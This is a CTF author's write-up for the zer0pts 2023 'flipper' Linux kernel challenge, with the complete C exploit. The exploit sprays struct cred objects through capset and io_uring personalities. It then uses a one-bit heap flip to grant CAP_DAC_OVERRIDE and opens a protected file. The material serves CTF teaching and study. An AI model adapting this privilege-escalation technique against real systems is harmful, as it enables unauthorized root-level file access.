
zer0pts CTF 2023 flipper (pwn) Author's Writeup

Written by Xion

Challenge Summary

A Linux kernel module exposes a heap-relative 1-bit flip primitive; use it for LPE and read the flag.
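
The module source is not part of this gist, so the interface below is reconstructed purely from how exploit.c drives the challenge device; take it as a sketch rather than the authoritative definition:

/* /dev/flipper interface as inferred from exploit.c (module source not included):
 *   ioctl(fd, CMD_ALLOC, size)    kmalloc() a buffer of `size` bytes; this
 *                                 allocation anchors the primitive
 *   ioctl(fd, CMD_FLIP, bit_ofs)  flip the bit located `bit_ofs` bits past
 *                                 the start of that allocation
 */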

Author's solution

  1. Spray struct cred objects via capset() + IORING_REGISTER_PERSONALITY¹
  2. Use the primitive to flip the CAP_DAC_OVERRIDE bit in cap_effective of one of the sprayed creds (see the worked computation after this list)
    • The offset between the driver's allocation and the sprayed creds is easily and stably guessable
  3. Submit an IORING_OP_OPENAT command with each registered personality (cred) in turn to override file permission checks and open the flag.
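
Concretely, the flip target is computed as in step 3 of exploit.c below. The page-aligned midpoint of the spray is a stable guess for where a sprayed cred sits relative to the driver's 0xc0 allocation (both presumably land in kmalloc-192):

int ofs = (0xffff * 0xc0 / 2) & ~0xfff; // middle of the 0xffff sprayed creds, page-aligned
ofs += 56;                              // cap_effective lives at offset 56 in struct cred
ofs <<= 3;                              // byte offset -> bit offset
ofs += 1;                               // bit 1 of cap_effective == CAP_DAC_OVERRIDE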

Other expected solutions

  1. Flip a pointer or a refcount to get a UAF and proceed with heap exploitation
    • Most solutions seem to have taken this route, pivoting to further exploitable primitives (notably DirtyCred²)
  2. Flip a bit in a length field (or equivalent) of some object and proceed with heap exploitation

Exploit

See exploit.c below. io_uring.c/h, cred.c/h, and util.h are thin wrappers over io_uring plus small utilities.
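
The gist ships no Makefile, so the exact build invocation is an assumption; given the file list above, something like the following should work:

/* assumed build line (not part of the original gist):
 *   gcc -O2 -static -o exploit exploit.c io_uring.c cred.c
 */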

Footnotes

  1. https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel

  2. https://zplin.me/papers/DirtyCred.pdf

cred.c

#include <unistd.h>
#include <sys/syscall.h>
#include <linux/capability.h>
#include "io_uring.h"
#include "cred.h"
#include "util.h"

void delete_n_creds(int uring_fd, size_t n_creds)
{
    for (size_t i = 0; i < n_creds; i++) {
        /* personality ids handed out by io_uring start at 1 */
        if (syscall(SYS_io_uring_register, uring_fd, IORING_UNREGISTER_PERSONALITY, NULL, i + 1) < 0)
            fatal("io_uring_register() failed");
    }
}

void alloc_n_creds(int uring_fd, size_t n_creds)
{
    for (size_t i = 0; i < n_creds; i++) {
        struct __user_cap_header_struct cap_hdr = {
            .pid = 0,
            .version = _LINUX_CAPABILITY_VERSION_3
        };
        struct user_cap_data_struct cap_data[2] = {
            {.effective = 0, .inheritable = 0, .permitted = 0},
            {.effective = 0, .inheritable = 0, .permitted = 0}
        };

        /* allocate a new cred (capset() installs a fresh struct cred) */
        if (syscall(SYS_capset, &cap_hdr, (void *)cap_data))
            fatal("capset() failed");

        /* increment its refcount so we don't free it afterwards */
        if (syscall(SYS_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, 0, 0) < 0)
            fatal("io_uring_register() failed");
    }
}
cred.h

#ifndef CRED_H
#define CRED_H

#include <stddef.h>
#include <stdint.h>

/* same layout as the kernel's __user_cap_data_struct */
struct user_cap_data_struct {
    uint32_t effective;
    uint32_t permitted;
    uint32_t inheritable;
};

void alloc_n_creds(int uring_fd, size_t n_creds);
void delete_n_creds(int uring_fd, size_t n_creds);

#endif // CRED_H
exploit.c

#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include "io_uring.h"
#include "cred.h"
#include "util.h"

#define CMD_ALLOC 0x13370000
#define CMD_FLIP  0x13370001

int main(void)
{
    int ffd, rootfd;

    // 0. prep stuff
    if ((ffd = open("/dev/flipper", O_RDONLY)) < 0) {
        fatal("[!] open /dev/flipper");
    }
    if ((rootfd = open("/", O_RDONLY | O_DIRECTORY)) < 0) {
        fatal("[!] open /");
    }
    struct submitter uring_cred;
    app_setup_uring(&uring_cred, 0x80);

    // 1. prep base alloc (0xc0 bytes, same slab as struct cred)
    if (ioctl(ffd, CMD_ALLOC, 0xc0)) {
        fatal("[!] ioctl CMD_ALLOC");
    }

    // 2. spray creds
    printf("[*] spraying 0xffff creds\n");
    alloc_n_creds(uring_cred.ring_fd, 0xffff);

    // 3. flip one of the creds' capability bits
    int ofs = (0xffff * 0xc0 / 2) & ~0xfff; // offset into the io_uring cred spray
    ofs += 56;                              // cap_effective @ cred + 56
    ofs <<= 3;                              // bytes -> bits
    ofs += 1;                               // bit 1 == CAP_DAC_OVERRIDE
    printf("[*] flip bit offset: 0x%x\n", ofs);
    if (ioctl(ffd, CMD_FLIP, ofs)) {
        fatal("[!] ioctl CMD_FLIP");
    }

    // 4. attempt to open the flag with elevated permissions
    struct io_uring_sqe sqe;
    memset(&sqe, 0, sizeof(sqe));
    sqe.opcode = IORING_OP_OPENAT;
    sqe.fd = rootfd;
    sqe.addr = (__u64)"flag";
    sqe.open_flags = O_RDWR; // with CAP_DAC_OVERRIDE, file permissions don't matter
    sqe.len = 0;
    sqe.file_index = 0;

    printf("[*] scan through all creds\n");
    int reaped_success = 0, reap_cnt = 0, flag_fd;
    for (int i = 0; i < 0xffff && !reaped_success; i++) {
        reap_cnt++;
        sqe.personality = i + 1;
        submit_to_sq(&uring_cred, &sqe, 1, 1);
        read_from_cq(&uring_cred, false, &reaped_success, &flag_fd);
    }
    if (!reaped_success) {
        fatal("[!] flag open fail (cred not hit)");
    }
    printf("[+] flag opened w/ cred 0x%x, flag fd: %d\n", reap_cnt, flag_fd);

    // 5. read flag
    char buf[0x100];
    write(STDOUT_FILENO, buf, read(flag_fd, buf, sizeof(buf)));
    return 0;
}
io_uring.c

/*
 * References:
 * https://github.com/shuveb/io_uring-by-example/blob/master/02_cat_uring/main.c
 * https://unixism.net/loti/low_level.html
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include "io_uring.h"
#include "util.h"

int io_uring_register(int fd, unsigned int opcode, void *arg,
                      unsigned int nr_args)
{
    return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

int io_uring_setup(unsigned int entries, struct io_uring_params *p)
{
    return syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_enter(int fd, unsigned int to_submit, unsigned int min_complete,
                   unsigned int flags)
{
    return syscall(__NR_io_uring_enter, fd, to_submit, min_complete,
                   flags, NULL, 0); // no signal mask
}

int uring_create_raw(size_t n_sqe, size_t n_cqe)
{
    struct io_uring_params p = {
        .cq_entries = n_cqe,
        .flags = IORING_SETUP_CQSIZE
    };
    int res = io_uring_setup(n_sqe, &p);
    if (res < 0)
        fatal("io_uring_setup() failed");
    return res;
}

int app_setup_uring(struct submitter *s, unsigned int entries)
{
    struct app_io_sq_ring *sring = &s->sq_ring;
    struct app_io_cq_ring *cring = &s->cq_ring;
    struct io_uring_params p;
    void *sq_ptr, *cq_ptr;

    /*
     * The io_uring_params structure passed to io_uring_setup() must be
     * zeroed out. We could set flags here if we needed to, but for this
     * example we don't.
     */
    memset(&p, 0, sizeof(p));
    //p.flags = IORING_SETUP_SQPOLL;
    //p.sq_thread_idle = 1000;
    p.wq_fd = -1;
    s->ring_fd = io_uring_setup(entries, &p); // SQ/CQ sized from `entries`
    if (s->ring_fd < 0) {
        perror("io_uring_setup");
        return 1;
    }

    /*
     * io_uring communication happens via two shared kernel-user ring buffers,
     * which can be jointly mapped with a single mmap() call on recent kernels.
     * While the completion queue is manipulated directly, the submission queue
     * has an indirection array in between; we map that in as well.
     */
    int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
    int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);

    /*
     * On kernel 5.4 and above, the submission and completion buffers can be
     * mapped with a single mmap() call. Rather than check kernel versions,
     * the recommended way is to check the features field of the
     * io_uring_params structure, which is a bit mask. If
     * IORING_FEAT_SINGLE_MMAP is set, we can do away with the second mmap()
     * call to map the completion ring.
     */
    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        if (cring_sz > sring_sz) {
            sring_sz = cring_sz;
        }
        cring_sz = sring_sz;
    }

    /*
     * Map in the submission and completion queue ring buffers.
     * Older kernels only map in the submission queue here.
     */
    sq_ptr = mmap(0, sring_sz, PROT_READ | PROT_WRITE,
                  MAP_SHARED | MAP_POPULATE,
                  s->ring_fd, IORING_OFF_SQ_RING);
    if (sq_ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        cq_ptr = sq_ptr;
    } else {
        /* On older kernels, map in the completion queue ring buffer separately */
        cq_ptr = mmap(0, cring_sz, PROT_READ | PROT_WRITE,
                      MAP_SHARED | MAP_POPULATE,
                      s->ring_fd, IORING_OFF_CQ_RING);
        if (cq_ptr == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
    }

    /* Save useful fields in the app_io_sq_ring struct for easy reference later */
    sring->head = sq_ptr + p.sq_off.head;
    sring->tail = sq_ptr + p.sq_off.tail;
    sring->ring_mask = sq_ptr + p.sq_off.ring_mask;
    sring->ring_entries = sq_ptr + p.sq_off.ring_entries;
    sring->flags = sq_ptr + p.sq_off.flags;
    sring->array = sq_ptr + p.sq_off.array;

    /* Save useful fields in the app_io_cq_ring struct for easy reference later */
    cring->head = cq_ptr + p.cq_off.head;
    cring->tail = cq_ptr + p.cq_off.tail;
    cring->ring_mask = cq_ptr + p.cq_off.ring_mask;
    cring->ring_entries = cq_ptr + p.cq_off.ring_entries;
    cring->cqes = cq_ptr + p.cq_off.cqes;

    /* Map in the submission queue entries array */
    s->sqes = mmap(0, p.sq_entries * sizeof(struct io_uring_sqe),
                   PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
                   s->ring_fd, IORING_OFF_SQES);
    if (s->sqes == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    return 0;
}

void app_debug_print_uring(struct submitter *s)
{
#define PTR_AND_DEREF(ptr) ptr, *(ptr)
    printf("struct submitter s = {\n");
    printf("    .ring_fd = %d,\n", s->ring_fd);
    printf("    .sq_ring = {\n");
    printf("        .head = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.head));
    printf("        .tail = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.tail));
    printf("        .ring_mask = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.ring_mask));
    printf("        .ring_entries = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.ring_entries));
    printf("        .flags = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.flags));
    printf("        .array = %p -> 0x%x\n", PTR_AND_DEREF(s->sq_ring.array));
    printf("    },\n");
    printf("    .cq_ring = {\n");
    printf("        .head = %p -> 0x%x,\n", PTR_AND_DEREF(s->cq_ring.head));
    printf("        .tail = %p -> 0x%x,\n", PTR_AND_DEREF(s->cq_ring.tail));
    printf("        .ring_mask = %p -> 0x%x,\n", PTR_AND_DEREF(s->cq_ring.ring_mask));
    printf("        .ring_entries = %p -> 0x%x,\n", PTR_AND_DEREF(s->cq_ring.ring_entries));
    printf("        .cqes = %p\n", s->cq_ring.cqes);
    printf("    },\n");
    printf("    .sqes = %p\n", s->sqes);
    printf("}\n");
#undef PTR_AND_DEREF
}

/*
 * Read from the completion queue.
 * Reap completion events from the completion queue, optionally printing each
 * CQE, and collect the result codes of successful completions.
 */
int read_from_cq(struct submitter *s, bool print, int *reaped_success, int *results)
{
    struct app_io_cq_ring *cring = &s->cq_ring;
    struct io_uring_cqe *cqe;
    unsigned head, reaped = 0, success = 0;

    head = *cring->head;
    do {
        read_barrier();
        /*
         * Remember, this is a ring buffer. If head == tail, the buffer
         * is empty.
         */
        if (head == *cring->tail)
            break;
        /* Get the entry */
        cqe = &cring->cqes[head & *cring->ring_mask];
        if (print) {
            if (cqe->res < 0) {
                printf("cqe: res = %d (error: %s), user_data = 0x%llx\n", cqe->res, strerror(abs(cqe->res)), cqe->user_data);
            } else {
                printf("cqe: res = %d, user_data = 0x%llx\n", cqe->res, cqe->user_data);
            }
        }
        if (cqe->res >= 0) {
            success++;
            if (results) {
                *results++ = cqe->res;
            }
        }
        head++;
        reaped++;
    } while (1);

    *cring->head = head;
    write_barrier();
    if (reaped_success != NULL) {
        *reaped_success = success;
    }
    return reaped;
}

/*
 * Submit to the submission queue.
 * Copy `sqe_len` SQEs into the SQ ring, publish the new tail, then tell the
 * kernel about them with io_uring_enter().
 */
int submit_to_sq(struct submitter *s, struct io_uring_sqe *sqes, unsigned int sqe_len, unsigned int min_complete)
{
    struct app_io_sq_ring *sring = &s->sq_ring;
    unsigned index, head, tail, next_tail, mask, to_submit;

    /* assume a unique submitter, i.e. the tail does not change under us */
    next_tail = tail = *sring->tail;

    /* Add our submission queue entries to the tail of the SQE ring buffer */
    for (to_submit = 0; to_submit < sqe_len; to_submit++) {
        read_barrier();
        head = *sring->head;      // may change as the kernel processes SQEs
        mask = *sring->ring_mask; // constant for the ring's lifetime
        // SQ full (tail wrapped back to head)
        if ((head & mask) == (tail & mask) && head != tail) {
            break;
        }
        next_tail++;
        index = tail & mask;
        struct io_uring_sqe *sqe = &s->sqes[index];
        memcpy(sqe, &sqes[to_submit], sizeof(*sqe));
        sring->array[index] = index;
        tail = next_tail;
    }

    /* Update the tail so the kernel can see it. */
    if (*sring->tail != tail) {
        *sring->tail = tail;
        write_barrier();
    }

    /*
     * Tell the kernel we have submitted events with the io_uring_enter()
     * system call. We also pass in the IORING_ENTER_GETEVENTS flag, which
     * causes io_uring_enter() to wait until min_complete events (the 3rd
     * param) complete.
     */
    int ret = io_uring_enter(s->ring_fd, to_submit, min_complete, IORING_ENTER_GETEVENTS);
    if (ret < 0) {
        perror("io_uring_enter");
        return ret;
    }
    //io_uring_enter(s->ring_fd, 0, 0, IORING_ENTER_SQ_WAKEUP);
    return to_submit;
}
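
As a sanity check for these wrappers, here is a minimal sketch (not from the original gist) that submits a single IORING_OP_NOP and reaps its completion:

/* Hypothetical usage example of the wrappers above. */
#include <string.h>
#include "io_uring.h"
#include "util.h"

int nop_demo(void)
{
    struct submitter s;
    if (app_setup_uring(&s, 8))
        fatal("app_setup_uring");

    struct io_uring_sqe sqe;
    memset(&sqe, 0, sizeof(sqe));
    sqe.opcode = IORING_OP_NOP;   /* completes immediately with res == 0 */

    submit_to_sq(&s, &sqe, 1, 1); /* submit one SQE, wait for one CQE */

    int ok = 0;
    read_from_cq(&s, true, &ok, NULL);
    return ok ? 0 : -1;
}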
io_uring.h

#ifndef IO_URING_H
#define IO_URING_H

#include <stddef.h>
#include <stdint.h>
#include <signal.h>
#include <stdbool.h>
#define __NR_io_uring_setup 425
#define __NR_io_uring_enter 426
#define __NR_io_uring_register 427
#define read_barrier() __asm__ __volatile__("":::"memory")
#define write_barrier() __asm__ __volatile__("":::"memory")
typedef uint8_t __u8;
typedef uint16_t __u16;
typedef uint32_t __u32;
typedef unsigned long long __u64;
typedef int8_t __s8;
typedef int16_t __s16;
typedef int32_t __s32;
typedef long long __s64;
typedef int __kernel_rwf_t;
#define __aligned_u64 __u64 __attribute__((aligned(8)))
#define __aligned_be64 __be64 __attribute__((aligned(8)))
#define __aligned_le64 __le64 __attribute__((aligned(8)))
/*
* IO submission data structure (Submission Queue Entry)
*/
struct io_uring_sqe {
    __u8 opcode;    /* type of operation for this sqe */
    __u8 flags;     /* IOSQE_ flags */
    __u16 ioprio;   /* ioprio for the request */
    __s32 fd;       /* file descriptor to do IO on */
    union {
        __u64 off;  /* offset into file */
        __u64 addr2;
    };
    union {
        __u64 addr; /* pointer to buffer or iovecs */
        __u64 splice_off_in;
    };
    __u32 len;      /* buffer size or number of iovecs */
    union {
        __kernel_rwf_t rw_flags;
        __u32 fsync_flags;
        __u16 poll_events;   /* compatibility */
        __u32 poll32_events; /* word-reversed for BE */
        __u32 sync_range_flags;
        __u32 msg_flags;
        __u32 timeout_flags;
        __u32 accept_flags;
        __u32 cancel_flags;
        __u32 open_flags;
        __u32 statx_flags;
        __u32 fadvise_advice;
        __u32 splice_flags;
        __u32 rename_flags;
        __u32 unlink_flags;
        __u32 hardlink_flags;
    };
    __u64 user_data; /* data to be passed back at completion time */
    /* pack this to avoid bogus arm OABI complaints */
    union {
        /* index into fixed buffers, if used */
        __u16 buf_index;
        /* for grouped buffer selection */
        __u16 buf_group;
    } __attribute__((packed));
    /* personality to use, if used */
    __u16 personality;
    union {
        __s32 splice_fd_in;
        __u32 file_index;
    };
    __u64 __pad2[2];
};

enum {
    IOSQE_FIXED_FILE_BIT,
    IOSQE_IO_DRAIN_BIT,
    IOSQE_IO_LINK_BIT,
    IOSQE_IO_HARDLINK_BIT,
    IOSQE_ASYNC_BIT,
    IOSQE_BUFFER_SELECT_BIT,
};
/*
* sqe->flags
*/
/* use fixed fileset */
#define IOSQE_FIXED_FILE (1U << IOSQE_FIXED_FILE_BIT)
/* issue after inflight IO */
#define IOSQE_IO_DRAIN (1U << IOSQE_IO_DRAIN_BIT)
/* links next sqe */
#define IOSQE_IO_LINK (1U << IOSQE_IO_LINK_BIT)
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK (1U << IOSQE_IO_HARDLINK_BIT)
/* always go async */
#define IOSQE_ASYNC (1U << IOSQE_ASYNC_BIT)
/* select buffer from sqe->buf_group */
#define IOSQE_BUFFER_SELECT (1U << IOSQE_BUFFER_SELECT_BIT)
/*
* io_uring_setup() flags
*/
#define IORING_SETUP_IOPOLL (1U << 0) /* io_context is polled */
#define IORING_SETUP_SQPOLL (1U << 1) /* SQ poll thread */
#define IORING_SETUP_SQ_AFF (1U << 2) /* sq_thread_cpu is valid */
#define IORING_SETUP_CQSIZE (1U << 3) /* app defines CQ size */
#define IORING_SETUP_CLAMP (1U << 4) /* clamp SQ/CQ ring sizes */
#define IORING_SETUP_ATTACH_WQ (1U << 5) /* attach to existing wq */
#define IORING_SETUP_R_DISABLED (1U << 6) /* start with ring disabled */
enum {
    IORING_OP_NOP,
    IORING_OP_READV,
    IORING_OP_WRITEV,
    IORING_OP_FSYNC,
    IORING_OP_READ_FIXED,
    IORING_OP_WRITE_FIXED,
    IORING_OP_POLL_ADD,
    IORING_OP_POLL_REMOVE,
    IORING_OP_SYNC_FILE_RANGE,
    IORING_OP_SENDMSG,
    IORING_OP_RECVMSG,
    IORING_OP_TIMEOUT,
    IORING_OP_TIMEOUT_REMOVE,
    IORING_OP_ACCEPT,
    IORING_OP_ASYNC_CANCEL,
    IORING_OP_LINK_TIMEOUT,
    IORING_OP_CONNECT,
    IORING_OP_FALLOCATE,
    IORING_OP_OPENAT,
    IORING_OP_CLOSE,
    IORING_OP_FILES_UPDATE,
    IORING_OP_STATX,
    IORING_OP_READ,
    IORING_OP_WRITE,
    IORING_OP_FADVISE,
    IORING_OP_MADVISE,
    IORING_OP_SEND,
    IORING_OP_RECV,
    IORING_OP_OPENAT2,
    IORING_OP_EPOLL_CTL,
    IORING_OP_SPLICE,
    IORING_OP_PROVIDE_BUFFERS,
    IORING_OP_REMOVE_BUFFERS,
    IORING_OP_TEE,
    IORING_OP_SHUTDOWN,
    IORING_OP_RENAMEAT,
    IORING_OP_UNLINKAT,
    IORING_OP_MKDIRAT,
    IORING_OP_SYMLINKAT,
    IORING_OP_LINKAT,

    /* this goes last, obviously */
    IORING_OP_LAST,
};
/*
* sqe->fsync_flags
*/
#define IORING_FSYNC_DATASYNC (1U << 0)
/*
* sqe->timeout_flags
*/
#define IORING_TIMEOUT_ABS (1U << 0)
#define IORING_TIMEOUT_UPDATE (1U << 1)
#define IORING_TIMEOUT_BOOTTIME (1U << 2)
#define IORING_TIMEOUT_REALTIME (1U << 3)
#define IORING_LINK_TIMEOUT_UPDATE (1U << 4)
#define IORING_TIMEOUT_CLOCK_MASK (IORING_TIMEOUT_BOOTTIME | IORING_TIMEOUT_REALTIME)
#define IORING_TIMEOUT_UPDATE_MASK (IORING_TIMEOUT_UPDATE | IORING_LINK_TIMEOUT_UPDATE)
/*
* sqe->splice_flags
* extends splice(2) flags
*/
#define SPLICE_F_FD_IN_FIXED (1U << 31) /* the last bit of __u32 */
/*
* POLL_ADD flags. Note that since sqe->poll_events is the flag space, the
* command flags for POLL_ADD are stored in sqe->len.
*
* IORING_POLL_ADD_MULTI Multishot poll. Sets IORING_CQE_F_MORE if
* the poll handler will continue to report
* CQEs on behalf of the same SQE.
*
* IORING_POLL_UPDATE Update existing poll request, matching
* sqe->addr as the old user_data field.
*/
#define IORING_POLL_ADD_MULTI (1U << 0)
#define IORING_POLL_UPDATE_EVENTS (1U << 1)
#define IORING_POLL_UPDATE_USER_DATA (1U << 2)
/*
* IO completion data structure (Completion Queue Entry)
*/
struct io_uring_cqe {
    __u64 user_data; /* sqe->data submission passed back */
    __s32 res;       /* result code for this event */
    __u32 flags;
};
/*
* cqe->flags
*
* IORING_CQE_F_BUFFER If set, the upper 16 bits are the buffer ID
* IORING_CQE_F_MORE If set, parent SQE will generate more CQE entries
*/
#define IORING_CQE_F_BUFFER (1U << 0)
#define IORING_CQE_F_MORE (1U << 1)
enum {
    IORING_CQE_BUFFER_SHIFT = 16,
};
/*
* Magic offsets for the application to mmap the data it needs
*/
#define IORING_OFF_SQ_RING 0ULL
#define IORING_OFF_CQ_RING 0x8000000ULL
#define IORING_OFF_SQES 0x10000000ULL
/*
* Filled with the offset for mmap(2)
*/
struct io_sqring_offsets {
    __u32 head;
    __u32 tail;
    __u32 ring_mask;
    __u32 ring_entries;
    __u32 flags;
    __u32 dropped;
    __u32 array;
    __u32 resv1;
    __u64 resv2;
};
/*
* sq_ring->flags
*/
#define IORING_SQ_NEED_WAKEUP (1U << 0) /* needs io_uring_enter wakeup */
#define IORING_SQ_CQ_OVERFLOW (1U << 1) /* CQ ring is overflown */
struct io_cqring_offsets {
    __u32 head;
    __u32 tail;
    __u32 ring_mask;
    __u32 ring_entries;
    __u32 overflow;
    __u32 cqes;
    __u32 flags;
    __u32 resv1;
    __u64 resv2;
};
/*
* cq_ring->flags
*/
/* disable eventfd notifications */
#define IORING_CQ_EVENTFD_DISABLED (1U << 0)
/*
* io_uring_enter(2) flags
*/
#define IORING_ENTER_GETEVENTS (1U << 0)
#define IORING_ENTER_SQ_WAKEUP (1U << 1)
#define IORING_ENTER_SQ_WAIT (1U << 2)
#define IORING_ENTER_EXT_ARG (1U << 3)
/*
* Passed in for io_uring_setup(2). Copied back with updated info on success
*/
struct io_uring_params {
    __u32 sq_entries;
    __u32 cq_entries;
    __u32 flags;
    __u32 sq_thread_cpu;
    __u32 sq_thread_idle;
    __u32 features;
    __u32 wq_fd;
    __u32 resv[3];
    struct io_sqring_offsets sq_off;
    struct io_cqring_offsets cq_off;
};
/*
* io_uring_params->features flags
*/
#define IORING_FEAT_SINGLE_MMAP (1U << 0)
#define IORING_FEAT_NODROP (1U << 1)
#define IORING_FEAT_SUBMIT_STABLE (1U << 2)
#define IORING_FEAT_RW_CUR_POS (1U << 3)
#define IORING_FEAT_CUR_PERSONALITY (1U << 4)
#define IORING_FEAT_FAST_POLL (1U << 5)
#define IORING_FEAT_POLL_32BITS (1U << 6)
#define IORING_FEAT_SQPOLL_NONFIXED (1U << 7)
#define IORING_FEAT_EXT_ARG (1U << 8)
#define IORING_FEAT_NATIVE_WORKERS (1U << 9)
#define IORING_FEAT_RSRC_TAGS (1U << 10)
/*
* io_uring_register(2) opcodes and arguments
*/
enum {
    IORING_REGISTER_BUFFERS = 0,
    IORING_UNREGISTER_BUFFERS = 1,
    IORING_REGISTER_FILES = 2,
    IORING_UNREGISTER_FILES = 3,
    IORING_REGISTER_EVENTFD = 4,
    IORING_UNREGISTER_EVENTFD = 5,
    IORING_REGISTER_FILES_UPDATE = 6,
    IORING_REGISTER_EVENTFD_ASYNC = 7,
    IORING_REGISTER_PROBE = 8,
    IORING_REGISTER_PERSONALITY = 9,
    IORING_UNREGISTER_PERSONALITY = 10,
    IORING_REGISTER_RESTRICTIONS = 11,
    IORING_REGISTER_ENABLE_RINGS = 12,

    /* extended with tagging */
    IORING_REGISTER_FILES2 = 13,
    IORING_REGISTER_FILES_UPDATE2 = 14,
    IORING_REGISTER_BUFFERS2 = 15,
    IORING_REGISTER_BUFFERS_UPDATE = 16,

    /* set/clear io-wq thread affinities */
    IORING_REGISTER_IOWQ_AFF = 17,
    IORING_UNREGISTER_IOWQ_AFF = 18,

    /* set/get max number of io-wq workers */
    IORING_REGISTER_IOWQ_MAX_WORKERS = 19,

    /* this goes last */
    IORING_REGISTER_LAST
};

/* io-wq worker categories */
enum {
    IO_WQ_BOUND,
    IO_WQ_UNBOUND,
};
/* deprecated, see struct io_uring_rsrc_update */
struct io_uring_files_update {
    __u32 offset;
    __u32 resv;
    __aligned_u64 /* __s32 * */ fds;
};

struct io_uring_rsrc_register {
    __u32 nr;
    __u32 resv;
    __u64 resv2;
    __aligned_u64 data;
    __aligned_u64 tags;
};

struct io_uring_rsrc_update {
    __u32 offset;
    __u32 resv;
    __aligned_u64 data;
};

struct io_uring_rsrc_update2 {
    __u32 offset;
    __u32 resv;
    __aligned_u64 data;
    __aligned_u64 tags;
    __u32 nr;
    __u32 resv2;
};
/* Skip updating fd indexes set to this value in the fd table */
#define IORING_REGISTER_FILES_SKIP (-2)
#define IO_URING_OP_SUPPORTED (1U << 0)
struct io_uring_probe_op {
    __u8 op;
    __u8 resv;
    __u16 flags; /* IO_URING_OP_* flags */
    __u32 resv2;
};

struct io_uring_probe {
    __u8 last_op; /* last opcode supported */
    __u8 ops_len; /* length of ops[] array below */
    __u16 resv;
    __u32 resv2[3];
    struct io_uring_probe_op ops[0];
};

struct io_uring_restriction {
    __u16 opcode;
    union {
        __u8 register_op; /* IORING_RESTRICTION_REGISTER_OP */
        __u8 sqe_op;      /* IORING_RESTRICTION_SQE_OP */
        __u8 sqe_flags;   /* IORING_RESTRICTION_SQE_FLAGS_* */
    };
    __u8 resv;
    __u32 resv2[3];
};
/*
* io_uring_restriction->opcode values
*/
enum {
    /* Allow an io_uring_register(2) opcode */
    IORING_RESTRICTION_REGISTER_OP = 0,

    /* Allow an sqe opcode */
    IORING_RESTRICTION_SQE_OP = 1,

    /* Allow sqe flags */
    IORING_RESTRICTION_SQE_FLAGS_ALLOWED = 2,

    /* Require sqe flags (these flags must be set on each submission) */
    IORING_RESTRICTION_SQE_FLAGS_REQUIRED = 3,

    IORING_RESTRICTION_LAST
};

struct io_uring_getevents_arg {
    __u64 sigmask;
    __u32 sigmask_sz;
    __u32 pad;
    __u64 ts;
};
/*
* Application-level struct
*/
struct app_io_sq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    unsigned *flags;
    unsigned *array;
};

struct app_io_cq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    struct io_uring_cqe *cqes;
};

struct submitter {
    int ring_fd;
    struct app_io_sq_ring sq_ring;
    struct app_io_cq_ring cq_ring;
    struct io_uring_sqe *sqes;
};

int io_uring_register(int fd, unsigned int opcode, void *arg,
                      unsigned int nr_args);
int io_uring_setup(unsigned int entries, struct io_uring_params *p);
int io_uring_enter(int fd, unsigned int to_submit, unsigned int min_complete,
                   unsigned int flags);
int uring_create_raw(size_t n_sqe, size_t n_cqe);
int app_setup_uring(struct submitter *s, unsigned int entries);
void app_debug_print_uring(struct submitter *s);
int read_from_cq(struct submitter *s, bool print, int *reaped_success, int *results);
int submit_to_sq(struct submitter *s, struct io_uring_sqe *sqes, unsigned int sqe_len, unsigned int min_complete);
int uring_create_raw(size_t n_sqe, size_t n_cqe);
int app_setup_uring(struct submitter *s, unsigned int entries);
void app_debug_print_uring(struct submitter *s);
int read_from_cq(struct submitter *s, bool print, int *reaped_success, int *results);
int submit_to_sq(struct submitter *s, struct io_uring_sqe *sqes, unsigned int sqe_len, unsigned int min_complete);
#endif // IO_URING_H
util.h

#ifndef UTIL_H
#define UTIL_H

#include <stdio.h>
#include <stdlib.h>
#include <stdnoreturn.h>

static noreturn void fatal(const char *msg)
{
    perror(msg);
    exit(EXIT_FAILURE);
}

#endif // UTIL_H